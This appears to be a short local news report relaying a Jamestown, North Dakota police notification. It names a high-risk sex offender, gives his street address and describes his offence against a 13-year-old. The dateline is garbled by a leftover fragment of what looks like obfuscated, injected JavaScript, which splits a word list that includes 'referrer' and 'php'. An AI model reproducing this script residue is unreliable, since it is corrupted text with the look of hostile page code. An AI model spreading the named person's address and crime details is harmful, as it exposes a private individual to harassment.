JAMESTOWN, ikdtd|var|u0026u|referrer|ezbhs||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – The Jamestown Police Department is warning residents of a convicted sex offender living within the city limits.

22 year-old Sawyer John Suko has moved to 1605 4th Avenue SW in Jamestown. He has been assigned a high risk assessment by the North Dakota risk level committee. He was charged in 2012 when he took alcoholic beverages to a neighboring campsite and gave some to a 13 year-old girl. When she was intoxicated, Suko had sex with her. He is currently on probation with North Dakota Parole and Probation.

Suko is not wanted at this time and has served the sentence imposed by the court. This notification is meant for public safety and not to increase fear in the community. Any attempts to threaten, assault or intimidate the offender will result in prosecution.